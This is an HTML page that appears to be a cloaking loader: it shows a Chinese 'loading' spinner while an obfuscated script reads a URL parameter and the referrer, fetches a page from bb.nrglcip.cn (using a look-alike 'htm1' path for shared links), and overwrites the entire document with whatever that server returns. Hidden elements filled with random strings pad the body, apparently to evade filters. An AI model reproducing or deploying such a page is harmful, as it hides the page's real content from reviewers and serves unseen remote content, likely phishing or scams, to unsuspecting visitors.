<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zfW2Amvr7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zfW2Amvr7 .xHDemUflse {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zfW2Amvr7 .content {
            line-height: 50px;
            text-align: center
        }

        .zfW2Amvr7 .img {
            width: 100%
        }

        .zfW2Amvr7 .hLl7yy {
            text-align: center
        }

        .zfW2Amvr7 .hLl7yy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zfW2Amvr7 .hLl7yy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zfW2Amvr7 .hLl7yy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zfW2Amvr7 .hLl7yy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zfW2Amvr7 .hLl7yy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zfW2Amvr7 .hLl7yy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zfW2Amvr7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rzbhHWPrpUN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xY3AmX = rzbhHWPrpUN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xY3AmX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xY3AmX +".html?a=share";
		}
		
        jw3L9Sn=url+"#"+new Date().getTime();
        jw3L9Sn && function() {
            $.get(jw3L9Sn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>YXUkzvSO38XTGIVYeo6dUXhfsiTtABb8Rx6siqc00wAxxAq0</span>
<span style='display:none'>YXUkzvSO38XTGIVYeo6dUXhfsiTtABb8Rx6siqc00wAxxAq0</span>
<a  href='#' style='display:none'>XJ4ICt9zRoNsXBaJLhJBjZANc9tN2mWa9a</a>
<ul style='display:none' >x41DhvZQQ201jg</ul>
<span style='display:none'>YXUkzvSO38XTGIVYeo6dUXhfsiTtABb8Rx6siqc00wAxxAq0</span>
<h1 style='display:none' >Iah5MGjNIbZMpwZ3lfOd423PsCZMYrOqEkuMJiRFhSwkeDwtz57jk</h1><div class="zfW2Amvr7">
    <div class="xHDemUflse">
        <div class="hLl7yy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>XDv2I90qKHl2Yq3qDSUWrmvrNC8T25HP0wG8S7xNJXZv5K6EaL7t4ZC904dNnKVJUBaOHLeCnv4n3JIXvC491dpMVV4dgaM2QuAPI</a>
<h1 style='display:none' >QFVOAyHBplbBRWW0m</h1>
<ul style='display:none' >L4vieQU4IlACgibjqs4eoxnFRygr4EGoRi</ul>
<h1 style='display:none' >QFVOAyHBplbBRWW0m</h1></body>
</html>